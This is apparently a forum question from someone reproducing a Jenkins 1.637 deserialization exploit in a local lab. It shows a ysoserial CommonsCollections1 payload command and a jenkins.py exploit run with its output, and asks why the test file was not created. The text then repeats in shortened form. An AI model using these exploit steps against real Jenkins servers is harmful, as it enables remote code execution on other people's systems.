I download the deb package of jenkins version 1.637 and install it in my Kali Linux.Then I start the service jenkins and check the status of jenkins.
I do the following exploit in the local:
Step One :
Use the tool - ysoserial to create the payload.
# java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'touch /tmp/pwned' > payload
Step Two:
# python jenkins.py localhost 8080 ../../payload
connecting to localhost port 39968
sending "Protocol:CLI-connect"
received "Welcome
"
received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
sending payload...
Then check the existing of /tmp/pwned.
But sadly, I don’t see this file. Is there any problem when I do my exploit?
I download the deb package of jenkins version 1.637 and install it in my Kali Linux.Then I start the service jenkins and check the status of jenkins.
I do the following exploit in the local:
Step One :
Use the tool - ysoserial to create the payload.
Step Two:
Then check the existing of /tmp/pwned.
But sadly, I don’t see this file.Is there any problem when I do my exploit?